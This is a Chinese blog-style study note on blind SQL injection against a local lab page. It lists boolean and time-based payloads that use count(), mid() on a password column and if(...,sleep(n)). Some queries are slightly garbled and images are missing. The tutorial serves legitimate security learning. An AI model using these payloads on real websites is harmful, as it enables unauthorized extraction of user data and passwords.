Sql注入(盲注)

学习笔记—Sql注入(盲注)

一、盲注实践:
select * from users where (id = 1) and 1<(select count() xxx) – and pid > 100;
在这里插入图片描述
在这里插入图片描述
select * from users where (id = 1) and (1<(select count(
) xxx)); – and pid > 100;
在这里插入图片描述
select * from users where (id = 1) and 1<(select count() xss); – and pid > 100;
在这里插入图片描述
select * from users where (id = 1) and 1=(select count(
) xss); – and pid > 100;
在这里插入图片描述
select * from users where (id = 1) and 1<=(select count() xss); – and pid > 100;
在这里插入图片描述
select * from users where (id = 1) and 1<=(select count(
) region); – and pid > 100;
在这里插入图片描述
select * from users where (id = 1) and 1>=(select count() xxx); – and pid > 100;
在这里插入图片描述
select * from users where (id = 1) and 1>=(select count(
) region); – and pid > 100;
在这里插入图片描述
select count() from site;
在这里插入图片描述
select * from users where (id = 1) and 6<(select count(
) site); – and pid > 100;
在这里插入图片描述
二、盲注函数实践:
desc site;
在这里插入图片描述
select * from users where (id = 1) and 1<(select count(id) from site); – and pid > 100;
在这里插入图片描述
select * from users where (id = 1) and 1<(select count(id) from users);
在这里插入图片描述
select * from users where (id = 1) and ‘2’=mid((select pass from users limit 1),1,1);
在这里插入图片描述
select * from users where (id = 1) and ‘1’=mid((select pass from users limit 1),1,1);
在这里插入图片描述
三、盲注实战:
select sleep(7);
在这里插入图片描述
select * from users where (id = 1) and 0=if(1<=(select count() users),sleep(3),2);
在这里插入图片描述
select * from users where (id = 1) and 0=if(1<(select count(
) from users),sleep(3),2);

在这里插入图片描述
select * from users where (id = 1) and 0=if(1<(select count() from users),sleep(7),2);
在这里插入图片描述
select * from users where (id = 1) and 0=if(0<>(select count(
) from users),sleep(7),2);
在这里插入图片描述
select * from users where (id = 1) and 0=if(15<>(select count() from users),sleep(7),2);
在这里插入图片描述
四、时间注入web
在这里插入图片描述
http://127.0.0.1/7-27/index.php
?id=1) and 0=if(0<>(select count(
) from users),sleep(5),2) – s
在这里插入图片描述
http://127.0.0.1/7-27/index.php
?id=1) and 0=if(0<>(select count(*) from users),sleep(7),2) --+
在这里插入图片描述
了解更多请关注下列公众号:
在这里插入图片描述

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值